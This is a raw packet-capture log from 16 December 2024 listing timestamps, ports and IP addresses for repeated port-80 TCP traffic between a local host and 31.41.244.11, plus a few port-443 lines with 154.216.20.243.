                                                                                                                                                                                              Dec 16, 2024 01:01:44.065176010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.065206051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.065237999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.066232920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.066277981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.066278934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.066323042 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.067358017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.067405939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.067506075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.067549944 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.068865061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.068881989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.068909883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.068962097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.069993019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.070010900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.070065975 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.070066929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.071332932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.071350098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.071388006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.071420908 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.072417021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.072433949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.072468996 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.072499990 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.073493958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.073509932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.073542118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.073575974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.074539900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.074580908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.074588060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.074618101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.075655937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.075704098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.075761080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.075804949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.076984882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.077034950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.077068090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.077110052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.078198910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.078217030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.078246117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.078279972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.079250097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.079307079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.079366922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.079411030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.080437899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.080485106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.080658913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.080703974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.081824064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.081841946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.081871986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.081906080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.082837105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.082891941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.082897902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.082937002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.084009886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.084064007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.084088087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.084127903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.085232019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.085283995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.085330009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.085376978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.086755037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.086771965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.086800098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.086836100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.087641001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.087657928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.087690115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.087723970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.088785887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.088814974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.088834047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.088866949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.089929104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.089973927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.090029955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.090085983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.091099977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.091146946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.091231108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.091275930 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.092308998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.092355967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.092714071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.092756033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.093492031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.093542099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.093791008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.093837023 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.094897032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.094913960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.094961882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.094963074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099325895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099343061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099384069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099384069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099656105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099680901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099699020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099704981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099719048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099730968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099730968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.099771023 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.219134092 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.219366074 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:44.220724106 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:44.220779896 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.221132040 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223145008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223172903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223222017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223366976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223639011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223689079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223797083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.223859072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.224961996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.224983931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.225018978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.225052118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.226061106 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.226115942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.234724998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.234783888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235013962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235064983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235274076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235337973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235421896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.235471010 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.236596107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.236613989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.236649990 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.236649990 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.237781048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.237798929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.237833977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.237855911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.238898993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.238946915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.239078999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.239123106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.240181923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.240228891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.240364075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.240410089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.241261005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.241306067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.241429090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.241476059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.242537975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.242583036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.242713928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.242769957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.243818045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.243839025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.243881941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.243881941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.244827032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.244873047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.244972944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.245012999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.246145964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.246191025 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.246309996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.246361017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.247241974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.247297049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.247415066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.247462988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.248332024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.248378992 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.248505116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.248552084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.249670982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.249716043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.249829054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.249871969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.250834942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.250881910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.250988007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.251033068 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.252041101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.252058983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.252087116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.252120972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.253230095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.253246069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.253307104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.253307104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.254370928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.254429102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.254538059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.254584074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.255630016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.255688906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.255753994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.255800962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.256269932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.256287098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.256326914 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.256357908 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.257878065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.257920980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.258045912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.258093119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.259179115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.259226084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.259330034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.259376049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.260324955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.260373116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.260503054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.260550976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.261539936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.261588097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.261847973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.261890888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.262707949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.262727976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.262762070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.262763023 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.263889074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.263938904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.264062881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.264110088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.265156031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.265173912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.265221119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.266163111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.266227961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.266495943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.266544104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.267414093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.267463923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.267585039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.267633915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.268594027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.268642902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.268765926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.268820047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.269833088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.269854069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.269882917 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.269932985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.270890951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.270941019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.271210909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.271259069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.272093058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.272139072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.272267103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.272320986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.273431063 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.273483038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.273587942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.273632050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.274624109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.274641037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.274678946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.274712086 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.275815010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.275840998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.275877953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.275877953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.276931047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.276983976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.277081966 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.277122974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.277923107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.277972937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.278255939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.278299093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.279373884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.279424906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.279542923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.279587030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.280424118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.280469894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.280563116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.280607939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.281673908 CET804984831.41.244.11192.168.2.4
